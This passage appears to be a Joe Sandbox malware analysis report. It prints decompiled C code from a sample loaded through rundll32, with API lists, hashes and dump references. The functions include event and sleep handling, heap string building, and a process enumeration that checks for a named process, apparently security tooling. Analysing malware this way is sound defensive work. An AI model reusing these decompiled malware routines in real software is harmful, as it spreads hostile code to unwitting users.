					_t42 = E04C09D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x04c0a1f1
                                          0x04c0a1f1
                                          0x04c0a1fb
                                          0x04c0a201
                                          0x04c0a204
                                          0x04c0a208
                                          0x04c0a20e
                                          0x04c0a213
                                          0x04c0a22c
                                          0x04c0a22f
                                          0x04c0a233
                                          0x04c0a237
                                          0x04c0a238
                                          0x04c0a23d
                                          0x04c0a240
                                          0x04c0a247
                                          0x04c0a24e
                                          0x04c0a2a1
                                          0x04c0a2a7
                                          0x04c0a2ad
                                          0x04c0a2e8
                                          0x04c0a2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0a2ad
                                          0x04c0a254
                                          0x00000000
                                          0x04c0a25b
                                          0x04c0a269
                                          0x04c0a26c
                                          0x04c0a26f
                                          0x04c0a27b
                                          0x04c0a27f
                                          0x04c0a2e1
                                          0x04c0a281
                                          0x04c0a284
                                          0x04c0a288
                                          0x04c0a289
                                          0x04c0a28a
                                          0x04c0a28c
                                          0x04c0a293
                                          0x04c0a2d1
                                          0x04c0a2dc
                                          0x04c0a295
                                          0x04c0a298
                                          0x04c0a29c
                                          0x04c0a29c
                                          0x04c0a293
                                          0x00000000
                                          0x04c0a27f
                                          0x04c0a254
                                          0x04c0a218
                                          0x04c0a21e
                                          0x04c0a221
                                          0x04c0a226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0a2b6
                                          0x04c0a2be
                                          0x04c0a2c3
                                          0x04c0a2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04C0A208
                                          • SetEvent.KERNEL32(?), ref: 04C0A218
                                          • GetLastError.KERNEL32 ref: 04C0A2A1
                                            • Part of subcall function 04C09D3A: WaitForMultipleObjects.KERNEL32(00000002,04C0AA33,00000000,04C0AA33,?,?,?,04C0AA33,0000EA60), ref: 04C09D55
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • GetLastError.KERNEL32(00000000), ref: 04C0A2D6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 7f6663393baab29c3d509f1e0aa794b451fba57391b688f96348ddd4a58917cd
                                          • Instruction ID: 321e24e14cb2b8a29c57e3ce117446bd073d9f045db5d1e55b11e10173ce9722
                                          • Opcode Fuzzy Hash: 7f6663393baab29c3d509f1e0aa794b451fba57391b688f96348ddd4a58917cd
                                          • Instruction Fuzzy Hash: 363103B5A00309EFDB21DFE5C8849AEB7B9EB18304F108A7AD546A2181D736AB45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C054AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04C054AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04C04F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04C05749(_t23);
						}
					}
					return _t38;
				}
				if(E04C09138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4c0d2a8, 1, 0,  *0x4c0d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04C09575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04C0A642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04C0568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04C072F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x04c054ac
                                          0x04c054b9
                                          0x04c054bf
                                          0x04c054c0
                                          0x04c054c1
                                          0x04c054c2
                                          0x04c054c3
                                          0x04c054c7
                                          0x04c054d3
                                          0x04c054d7
                                          0x04c0555f
                                          0x04c0555f
                                          0x04c05562
                                          0x04c05564
                                          0x04c0556c
                                          0x04c05572
                                          0x04c05575
                                          0x04c05575
                                          0x04c05572
                                          0x04c05580
                                          0x04c05580
                                          0x04c054ea
                                          0x04c054ec
                                          0x04c054ec
                                          0x04c05503
                                          0x04c05507
                                          0x04c0550a
                                          0x04c05515
                                          0x04c0551c
                                          0x04c0551c
                                          0x04c05525
                                          0x04c05529
                                          0x04c05537
                                          0x04c0552b
                                          0x04c0552b
                                          0x04c0552c
                                          0x04c0552d
                                          0x04c0552e
                                          0x04c0552f
                                          0x04c05530
                                          0x04c05530
                                          0x04c0553c
                                          0x04c0553f
                                          0x04c05543
                                          0x04c05545
                                          0x04c05545
                                          0x04c0554c
                                          0x00000000
                                          0x04c0554e
                                          0x04c0554e
                                          0x04c0555b
                                          0x00000000
                                          0x04c0555b

                                          APIs
                                          • CreateEventA.KERNEL32(04C0D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 04C054FD
                                          • SetEvent.KERNEL32(00000000), ref: 04C0550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04C05515
                                          • CloseHandle.KERNEL32(00000000), ref: 04C0551C
                                            • Part of subcall function 04C09575: WaitForSingleObject.KERNEL32(00000000,?,?,?,04C0553C,?,04C0553C,?,?,?,?,?,04C0553C,?), ref: 04C0964F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 19cc70ad68985b42488d76aecd1eabfc84c11b6e0081941126665cf9c5c3b20c
                                          • Instruction ID: c43b2e89b4882a7ca46db85995a9298b388d95146b9d8ffb0b43363b6ce397f6
                                          • Opcode Fuzzy Hash: 19cc70ad68985b42488d76aecd1eabfc84c11b6e0081941126665cf9c5c3b20c
                                          • Instruction Fuzzy Hash: EE215076D00119BBDB10EFE9D8849AEB7BBEF44354B05C525EA12A7180D634FB418F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C01295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E04C01295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04C058BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x04c012a1
                                          0x04c012a5
                                          0x04c012a6
                                          0x04c012a7
                                          0x04c012a9
                                          0x04c012ab
                                          0x04c012ae
                                          0x04c012b3
                                          0x04c0134a
                                          0x04c01351
                                          0x04c01351
                                          0x04c012bc
                                          0x04c012c3
                                          0x04c012d3
                                          0x04c012d3
                                          0x04c012d9
                                          0x04c012db
                                          0x04c012e0
                                          0x04c012e9
                                          0x04c012ef
                                          0x04c012f4
                                          0x04c012ff
                                          0x04c01303
                                          0x04c01305
                                          0x04c01306
                                          0x04c0130f
                                          0x04c01313
                                          0x04c01324
                                          0x04c01315
                                          0x04c0131a
                                          0x04c0131f
                                          0x04c0132e
                                          0x04c0132e
                                          0x04c01303
                                          0x04c01334
                                          0x04c0133a
                                          0x04c0133a
                                          0x04c01343
                                          0x04c01348
                                          0x04c01348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 2cd36a806097c4a57574f9220e6d7e4797ec260f9628461313bad24c901e69e6
                                          • Instruction ID: 93c852ba59f92f17c687c382d850e85841dbc14f6b5ecb48796a10d86bddc055
                                          • Opcode Fuzzy Hash: 2cd36a806097c4a57574f9220e6d7e4797ec260f9628461313bad24c901e69e6
                                          • Instruction Fuzzy Hash: D4214F7590120AEFDB11DFA4C9849DEBBB9FF48304B1481A9E941E7240EB31EA41DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C04858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04C04858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4c0d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4c0d250; // 0x532ac1ea
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4c0d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x04c04860
                                          0x04c04863
                                          0x04c04869
                                          0x04c04881
                                          0x04c04883
                                          0x04c04888
                                          0x04c0488a
                                          0x04c0488d
                                          0x04c0488f
                                          0x04c04892
                                          0x04c04894
                                          0x04c04894
                                          0x04c04896
                                          0x04c048a1
                                          0x04c048a6
                                          0x04c048b7
                                          0x04c048bf
                                          0x04c048c4
                                          0x04c048c7
                                          0x04c048ca
                                          0x04c048cc
                                          0x04c048cf
                                          0x04c048d2
                                          0x04c048d2
                                          0x04c048d5
                                          0x04c048e0
                                          0x04c048e5
                                          0x04c048ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04C04DBF,00000000,?,?,04C052FE,?,055895B0), ref: 04C04863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C0487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04C04DBF,00000000,?,?,04C052FE,?,055895B0), ref: 04C048BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04C048E0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: e89ec1079e899449cef3d9f0dd3a11efa45999d1c6b0c8441906faba393674ce
                                          • Instruction ID: bac9ccb6629094263958e940c2bdb07ffb064b1ff3843de2006be15b21a97c29
                                          • Opcode Fuzzy Hash: e89ec1079e899449cef3d9f0dd3a11efa45999d1c6b0c8441906faba393674ce
                                          • Instruction Fuzzy Hash: 51110676A00114AFD318CFA9DC88EAEBBEEDB80350B064276F605DB180E7749E00D764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C06AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E04C06AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04C06F89(_t8, _t1);
				_t16 = E04C058BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04C09038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04C058BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04C0147E(_t16);
				}
				return _t18;
			}









                                          0x04c06b02
                                          0x04c06b03
                                          0x04c06b06
                                          0x04c06b08
                                          0x04c06b13
                                          0x04c06b17
                                          0x04c06b1c
                                          0x04c06b20
                                          0x04c06b28
                                          0x04c06b2d
                                          0x04c06b35
                                          0x04c06b35
                                          0x04c06b3e
                                          0x04c06b42
                                          0x04c06b48
                                          0x04c06b4b
                                          0x04c06b51
                                          0x04c06b51
                                          0x04c06b59
                                          0x04c06b59
                                          0x04c06b60
                                          0x04c06b60
                                          0x04c06b6b

                                          APIs
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                            • Part of subcall function 04C09038: wsprintfA.USER32 ref: 04C09094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04C02098,74666F53,00000000,?,04C0D00C,?,?), ref: 04C06B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C06B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04C06B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 0bfb62216ed6a28c72896584b99e1756ad660fe5c8f671a500e2bb0fb9d0f57c
                                          • Instruction ID: 24cbe031bd2ec870d79cfe9301f790073803e32b2a1cdb1a0d8f8a2ecf563309
                                          • Opcode Fuzzy Hash: 0bfb62216ed6a28c72896584b99e1756ad660fe5c8f671a500e2bb0fb9d0f57c
                                          • Instruction Fuzzy Hash: 4D012B726001057BE7222FA88C84FEF3B6EDF84349F04C120F90056180DB38DA55DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C056A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04C056A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4c0d2a4; // 0x97a5a8
						_t2 = _t9 + 0x4c0ee38; // 0x73617661
						_push( &_v264);
						if( *0x4c0d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x04c056ad
                                          0x04c056b7
                                          0x04c056bb
                                          0x04c056c5
                                          0x04c056f6
                                          0x04c056cc
                                          0x04c056d1
                                          0x04c056de
                                          0x04c056e7
                                          0x04c056fe
                                          0x04c056e9
                                          0x04c056f1
                                          0x00000000
                                          0x04c056f1
                                          0x04c056ff
                                          0x04c05700
                                          0x00000000
                                          0x04c05700
                                          0x00000000
                                          0x04c056fa
                                          0x04c05706
                                          0x04c0570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04C056B2
                                          • Process32First.KERNEL32(00000000,?), ref: 04C056C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 04C056F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04C05700
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 8f140e55596a78f0c6d6a75f8500e30211626e91105b5ed8796f3f470d35e700
                                          • Instruction ID: 045dc76a7a4849bc4e924d3f9392ae3b9beea826fd067fd1681b0ecc9301b684
                                          • Opcode Fuzzy Hash: 8f140e55596a78f0c6d6a75f8500e30211626e91105b5ed8796f3f470d35e700
                                          • Instruction Fuzzy Hash: D7F0FC7260113467F710E6769C08EEB76ADDB85344F018051E905C2180E624EE468BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C07283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C07283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x04c0728d
                                          0x04c07291
                                          0x04c072a6
                                          0x04c072a8
                                          0x04c072ad
                                          0x04c072b3
                                          0x04c072b5
                                          0x04c072ba
                                          0x04c072c5
                                          0x04c072bc
                                          0x04c072bc
                                          0x04c072bc
                                          0x04c072ba
                                          0x04c072d3

                                          APIs
                                          • memset.NTDLL ref: 04C07291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04C072A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04C072B3
                                          • CloseHandle.KERNEL32(?), ref: 04C072C5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 703fe6d00bf263bd45f6b7f9008615ff94bb1e23ea3bd234a5a1b5aca02a8db6
                                          • Instruction ID: 6f0638f006d6c752a454cd9f2b00a8a0b85bc1f7a35123003f8c3c21b9f136fe
                                          • Opcode Fuzzy Hash: 703fe6d00bf263bd45f6b7f9008615ff94bb1e23ea3bd234a5a1b5aca02a8db6
                                          • Instruction Fuzzy Hash: BDF05EF1205308FFE314AF66DCC4C27BBADFB5129CB12892EF18282151D676B8048A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0A2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04C0A2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E04C058BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x04c0a2f2
                                          0x04c0a2f6
                                          0x04c0a2f8
                                          0x04c0a2fe
                                          0x04c0a302
                                          0x04c0a304
                                          0x04c0a304
                                          0x04c0a306
                                          0x04c0a30f
                                          0x04c0a313
                                          0x04c0a31b
                                          0x04c0a32a
                                          0x04c0a32f
                                          0x04c0a337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04C09AA8,00000000,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 04C0A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C0A31B
                                          • memset.NTDLL ref: 04C0A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 7f03057ddd970c893fca81281a0a8d64e7200b19d000815c6f6a894c3d7a98be
                                          • Instruction ID: 7696b91d5a4e1f6a3651eaac8a53847bdcfacf1ea7cd28aa3e8693cc033c49ba
                                          • Opcode Fuzzy Hash: 7f03057ddd970c893fca81281a0a8d64e7200b19d000815c6f6a894c3d7a98be
                                          • Instruction Fuzzy Hash: 44E02B73A053116BE730AAF95CCCD8F2A9EDBD4254B008935FE15C7244E631DD14C6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C078AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C078AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4c0d26c; // 0x40c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4c0d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4c0d26c; // 0x40c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4c0d238; // 0x5190000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x04c078ad
                                          0x04c078b4
                                          0x04c078fe
                                          0x04c07900
                                          0x04c07900
                                          0x04c078b8
                                          0x04c078be
                                          0x04c078c3
                                          0x04c078c7
                                          0x04c078cd
                                          0x04c078d4
                                          0x00000000
                                          0x00000000
                                          0x04c078d6
                                          0x04c078db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c078db
                                          0x04c078dd
                                          0x04c078e5
                                          0x04c078e8
                                          0x04c078e8
                                          0x04c078ee
                                          0x04c078f5
                                          0x04c078f8
                                          0x04c078f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(0000040C,00000001,04C06F2D), ref: 04C078B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04C078C7
                                          • CloseHandle.KERNEL32(0000040C), ref: 04C078E8
                                          • HeapDestroy.KERNEL32(05190000), ref: 04C078F8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 7bc517ffb68d9c0e2ba20733369646d42fb7e2ff0e75072d6ade3f9ea38a4ad1
                                          • Instruction ID: 7f60eb4086499704c67f2dc5524beac32703a2a0c76546bb374e2191064d0be6
                                          • Opcode Fuzzy Hash: 7bc517ffb68d9c0e2ba20733369646d42fb7e2ff0e75072d6ade3f9ea38a4ad1
                                          • Instruction Fuzzy Hash: 8CF03779B0631197F7285A759948B16779EDB057517168710BC01E71C0CB38FD80D560
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C04C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
